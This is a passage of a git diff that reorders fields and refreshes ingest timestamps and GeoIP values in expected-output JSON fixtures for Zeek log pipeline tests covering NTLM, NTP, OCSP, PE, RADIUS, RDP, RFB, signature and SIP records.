0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" diff --git a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json index 5b7004c6c83..82fe1cde54b 100644 --- a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json +++ b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2017-10-25T19:18:37.814Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JeffV" + ], + "ip": [ + "192.168.10.50", + "192.168.10.31" + ] + }, "destination": { "port": 445, "address": "192.168.10.31", @@ -26,29 +39,8 @@ "address": "192.168.10.50", "ip": "192.168.10.50" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ntlm", - "community_id": "1:zxnXAE/Cme5fQhh6sJLs7GItc08=", - "transport": "tcp" - }, - "@timestamp": "2017-10-25T19:18:37.814Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JeffV" - ], - "ip": [ - "192.168.10.50", - "192.168.10.31" - ] - }, "event": { - "ingested": "2021-12-09T13:51:06.115477800Z", + "ingested": "2021-12-14T14:59:17.857033520Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -65,6 +57,14 @@ "user": { "name": "JeffV", "domain": "contoso.local" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ntlm", + "community_id": "1:zxnXAE/Cme5fQhh6sJLs7GItc08=", + "transport": "tcp" } }, { @@ -123,7 +123,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:06.115485200Z", + "ingested": "2021-12-14T14:59:17.857036252Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json index d396a03c1e0..ec5cd75bf1e 100644 --- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json +++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json @@ -13,14 +13,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -54,14 +54,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -75,7 +75,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:06.504150200Z", + "ingested": "2021-12-14T14:59:18.281284207Z", "original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -110,14 +110,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -151,14 +151,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -172,7 +172,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:06.504154100Z", + "ingested": "2021-12-14T14:59:18.281286584Z", "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json index 1884e9707ab..7efdea21459 100644 --- a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json +++ b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json @@ -27,7 +27,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066331400Z", + "ingested": "2021-12-14T14:59:18.777548722Z", "original": "{\"ts\":1307712421.847886,\"id\":\"FSEWoS3ff8FcTn3WLf\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"14A7E219F46B93E141258F08BC85764671F136B0\",\"issuerKeyHash\":\"EEDD79C0D379B04D7E47BC70A6E7C62AAEBADEC9\",\"serialNumber\":\"9239D5348F40D1695A745470E1F23F43\",\"certStatus\":\"revoked\",\"revoketime\":1300220120.0,\"thisUpdate\":1307640343.0,\"nextUpdate\":1307985943.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -63,7 +63,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066340100Z", + "ingested": "2021-12-14T14:59:18.777551187Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -107,7 +107,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066346600Z", + "ingested": "2021-12-14T14:59:18.777551613Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" diff --git a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json index 099784ba16d..b31081bef9b 100644 --- a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json +++ b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json @@ -32,7 +32,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.328453Z", + "ingested": "2021-12-14T14:59:19.055069231Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" @@ -87,7 +87,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.328459900Z", + "ingested": "2021-12-14T14:59:19.055072192Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" diff --git a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json index 64282c8e9aa..5cc87b60c38 100644 --- a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json +++ b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2008-08-01T22:52:17.916Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "John.McGuirk" + ], + "ip": [ + "10.0.0.1", + "10.0.0.100" + ] + }, "destination": { "port": 1812, "address": "10.0.0.100", @@ -19,29 +32,8 @@ "address": "10.0.0.1", "ip": "10.0.0.1" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "radius", - "community_id": "1:3SdDgWXPnheV2oGfVmxQjfwtr8E=", - "transport": "udp" - }, - "@timestamp": "2008-08-01T22:52:17.916Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "John.McGuirk" - ], - "ip": [ - "10.0.0.1", - "10.0.0.100" - ] - }, "event": { - "ingested": "2021-12-09T13:51:07.578196900Z", + "ingested": "2021-12-14T14:59:19.314695081Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -58,6 +50,14 @@ }, "user": { "name": "John.McGuirk" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "radius", + "community_id": "1:3SdDgWXPnheV2oGfVmxQjfwtr8E=", + "transport": "udp" } }, { @@ -109,7 +109,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:07.578205400Z", + "ingested": "2021-12-14T14:59:19.314699063Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json index 03bd4ffb157..6562e2dbe71 100644 --- a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json +++ b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json @@ -1,6 +1,16 @@ { "expected": [ { + "@timestamp": "2019-09-10T16:18:59.668Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.131.1", + "192.168.131.131" + ] + }, "destination": { "port": 3389, "address": "192.168.131.131", @@ -17,34 +27,16 @@ "ssl": true } }, + "tls": { + "established": true + }, "source": { "port": 33872, "address": "192.168.131.1", "ip": "192.168.131.1" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "rdp", - "community_id": "1:PsQu6lSZioPVi0A5K7UaeGsVqS0=", - "transport": "tcp" - }, - "@timestamp": "2019-09-10T16:18:59.668Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.131.1", - "192.168.131.131" - ] - }, - "tls": { - "established": true - }, "event": { - "ingested": "2021-12-09T13:51:07.959730500Z", + "ingested": "2021-12-14T14:59:19.676106597Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -56,6 +48,14 @@ "protocol", "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "rdp", + "community_id": "1:PsQu6lSZioPVi0A5K7UaeGsVqS0=", + "transport": "tcp" } }, { @@ -110,7 +110,7 @@ "established": true }, "event": { - "ingested": "2021-12-09T13:51:07.959740Z", + "ingested": "2021-12-14T14:59:19.676109106Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json index 833175657c7..f1157551473 100644 --- a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json +++ b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json @@ -45,7 +45,7 @@ "ip": "192.168.1.123" }, "event": { - "ingested": "2021-12-09T13:51:08.328387900Z", + "ingested": "2021-12-14T14:59:20.028017778Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -128,7 +128,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:08.328393600Z", + "ingested": "2021-12-14T14:59:20.028020108Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json index 84863c54ea1..86c5ff5983d 100644 --- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json +++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json @@ -1,17 +1,26 @@ { "expected": [ { + "@timestamp": "2021-01-28T16:53:29.869Z", + "ecs": { + "version": "1.10.0" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -38,14 +47,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -58,28 +67,19 @@ "port": 51617, "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "@timestamp": "2021-01-28T16:53:29.869Z", - "ecs": { - "version": "1.10.0" - }, - "related": { - "ip": [ - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:08.678071800Z", + "ingested": "2021-12-14T14:59:20.383852825Z", "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"89.160.20.156\",\"src_port\": 51617,\"dst_addr\": \"89.160.20.156\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"89.160.20.156: TCP traffic\",\"sub_msg\": \"\"}", "id": "CbjAXE4CBxJ8W7VoJg", "category": "network", "created": "2020-04-28T11:07:58.223Z", "kind": "alert" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } } ] diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json index 8ee74f2db18..7ec0abcd06c 100644 --- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json @@ -1,17 +1,27 @@ { "expected": [ { + "@timestamp": "2013-02-26T22:02:39.055Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "172.16.133.19", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -62,29 +72,8 @@ "address": "172.16.133.19", "ip": "172.16.133.19" }, - "url": { - "full": "sip:newyork.voip.ms:5060" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=", - "transport": "udp" - }, - "@timestamp": "2013-02-26T22:02:39.055Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "172.16.133.19", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041817900Z", + "ingested": "2021-12-14T14:59:20.758597365Z", "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -99,20 +88,40 @@ "error" ], "outcome": "failure" + }, + "url": { + "full": "sip:newyork.voip.ms:5060" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=", + "transport": "udp" } }, { + "@timestamp": "2005-01-14T17:58:02.965Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -164,14 +173,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -184,6 +193,22 @@ "port": 5061, "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:59:20.758599867Z", + "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", + "created": "2020-04-28T11:07:58.223Z", + "kind": "event", + "action": "INVITE", + "id": "ComJz236lSOcuOmix3", + "category": [ + "network" + ], + "type": [ + "connection", + "protocol" + ], + "outcome": "success" + }, "url": { "full": "sip:francisco@bestel.com:55060" }, @@ -194,8 +219,10 @@ "protocol": "sip", "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" - }, - "@timestamp": "2005-01-14T17:58:02.965Z", + } + }, + { + "@timestamp": "2005-01-14T17:58:07.022Z", "ecs": { "version": "1.12.0" }, @@ -204,35 +231,17 @@ "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T13:51:09.041826300Z", - "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", - "created": "2020-04-28T11:07:58.223Z", - "kind": "event", - "action": "INVITE", - "id": "ComJz236lSOcuOmix3", - "category": [ - "network" - ], - "type": [ - "connection", - "protocol" - ], - "outcome": "success" - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -281,14 +290,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -301,28 +310,8 @@ "port": 5061, "ip": "89.160.20.156" }, - "url": { - "full": "sip:Verso.com" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", - "transport": "udp" - }, - "@timestamp": "2005-01-14T17:58:07.022Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041832Z", + "ingested": "2021-12-14T14:59:20.758600362Z", "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -336,9 +325,30 @@ "protocol" ], "outcome": "success" + }, + "url": { + "full": "sip:Verso.com" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T15:50:16.928Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + 